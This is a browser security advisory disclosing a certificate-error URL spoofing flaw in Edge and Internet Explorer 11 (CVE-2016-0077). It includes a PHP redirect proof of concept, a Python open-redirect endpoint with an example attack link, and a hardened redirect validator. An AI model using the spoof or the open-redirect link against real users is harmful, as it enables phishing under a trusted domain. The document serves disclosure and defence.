Microsoft Edge/Internet Explorer Certificate Error Url Spoofing

Tested on Windows 10 x64
Edge Version: 20.10240.16384.0
Internet Explorer Version: 11.0.10240.16431

Overview:

Microsoft Edge is a web browser developed by Microsoft and included in the company's Windows 10 operating systems, replacing Internet Explorer as the default web browser on all device classes.

https://en.wikipedia.org/wiki/Microsoft_Edge

https://www.microsoft.com/en-us/windows/microsoft-edge

&

Internet Explorer is a series of graphical web browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems, starting in 1995. It was first released as part of the add-on package Plus! for Windows 95 that year. Later versions were available as free downloads, or in service packs, and included in the Original Equipment Manufacturer (OEM) service releases of Windows 95 and later versions of Windows.

https://en.wikipedia.org/wiki/Internet_Explorer

http://windows.microsoft.com/en-us/internet-explorer/

Vulnerability description:

What do these screenshots show? A certificate error on the domain http://kacperrybczynski.com/? No! (Hint: a certificate error over plain HTTP?)

The error concerns a certificate, but that certificate belongs to another domain (not http://kacperrybczynski.com/). Which one, and why is it shown here?

The browser processes the response headers before it updates the address bar. The spoof occurs when Edge/IE receive a response carrying a "Location:" header (HTTP 302) that points at an HTTPS site with an untrusted certificate: the browser follows the redirect and shows the certificate error page for the redirect target, but the address bar still displays the original, pre-redirect URL.

How can this be used in the wild? Combine it with an open redirect or HTTP response splitting vulnerability on a site the victim trusts: the trusted domain stays visible in the address bar while the certificate error belongs to the attacker's host, so the victim is tricked into accepting an insecure certificate on the strength of the domain shown in the URI.

PoC:

http://kacperrybczynski.com/research/microsoft_edge_certificate_error_url_spoof/poc/

PoC source code:

<?php
// Redirect the visitor to an HTTPS host that serves an untrusted certificate.
// Edge/IE follow the 302, display the certificate error for the target host,
// but keep this page's URL (http://kacperrybczynski.com/...) in the address bar.
header("Location: https://elo.devilteam.pl/");
?>
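The advisory notes that the spoof becomes dangerous when the 302 is issued by a site the victim already trusts, for example through an open redirect. The following added example (not the advisory author's code) models that abuse vector and its server-side mitigation: an HTTP endpoint that echoes an attacker-supplied "next" parameter into the Location header, beside a hardened version that only permits same-origin, path-relative targets and also refuses CR/LF (the response-splitting case). The trusted origin http://trusted.example is a hypothetical stand-in for the site hosting the redirect; the redirect target https://elo.devilteam.pl/ is the host from the PoC.

```python
"""Open-redirect endpoint that can be used to trigger the cross-origin
certificate error described above, beside a hardened variant.

Added illustration, not the advisory author's code.  Assumptions:
  - TRUSTED_ORIGIN (http://trusted.example) is a hypothetical site the
    victim trusts and which exposes /redirect?next=... and /safe?next=...
  - https://elo.devilteam.pl/ serves an untrusted certificate, as in the PoC.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urljoin, urlsplit

TRUSTED_ORIGIN = "http://trusted.example"  # hypothetical trusted site
PHISH_TARGET = "https://elo.devilteam.pl/"  # host with the bad certificate (from the PoC)

# Link an attacker would send: the victim sees trusted.example in the address
# bar while the certificate error belongs to elo.devilteam.pl.
ATTACK_URL = TRUSTED_ORIGIN + "/redirect?next=" + PHISH_TARGET


def vulnerable_location(next_param: str) -> str:
    """Open redirect: the attacker-controlled value lands verbatim in Location."""
    return next_param


def safe_location(next_param: str) -> str:
    """Return a redirect target that is guaranteed to stay on TRUSTED_ORIGIN.

    Rejects (falls back to '/'):
      - empty values and absolute URLs (scheme://host/...)
      - scheme-relative targets (//host/...) and backslash variants
        (/\\host, \\\\host) that some browsers normalise to //host
      - CR/LF, which would split the response into injected headers
    """
    if not next_param or not next_param.startswith("/"):
        return "/"
    if next_param.startswith("//") or "\\" in next_param:
        return "/"
    if "\r" in next_param or "\n" in next_param:
        return "/"
    # Resolve the candidate the way a browser would and re-check the origin,
    # so that odd encodings cannot slip a different host past the prefix tests.
    parts = urlsplit(urljoin(TRUSTED_ORIGIN + "/", next_param))
    if f"{parts.scheme}://{parts.netloc}" != TRUSTED_ORIGIN:
        return "/"
    return next_param


class RedirectHandler(BaseHTTPRequestHandler):
    """'/redirect' is the open redirect; '/safe' applies safe_location()."""

    def do_GET(self) -> None:
        url = urlsplit(self.path)
        target = parse_qs(url.query).get("next", [""])[0]
        if url.path == "/redirect":
            location = vulnerable_location(target)
        elif url.path == "/safe":
            location = safe_location(target)
        else:
            self.send_error(404)
            return
        self.send_response(302)
        self.send_header("Location", location)
        self.end_headers()


if __name__ == "__main__":
    # Then open ATTACK_URL-style links against 127.0.0.1:8080 in a browser.
    HTTPServer(("127.0.0.1", 8080), RedirectHandler).serve_forever()
```

The server-side check only closes the abuse vector on the redirecting site; the underlying defect is the browser showing the pre-redirect URL on the certificate error page, which was fixed in the bulletins listed in the timeline below.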

Reference:

https://en.wikipedia.org/wiki/Spoofed_URL

Disclosure Timeline:

2015-10-27 - Vulnerability reported to vendor

2016-02-19 - CVE-2016-0077

2016-02-19 - Release fix in Microsoft Security Bulletin MS16-009/MS16-011

Reported by:

Kacper Rybczyński (@kacperybczynski)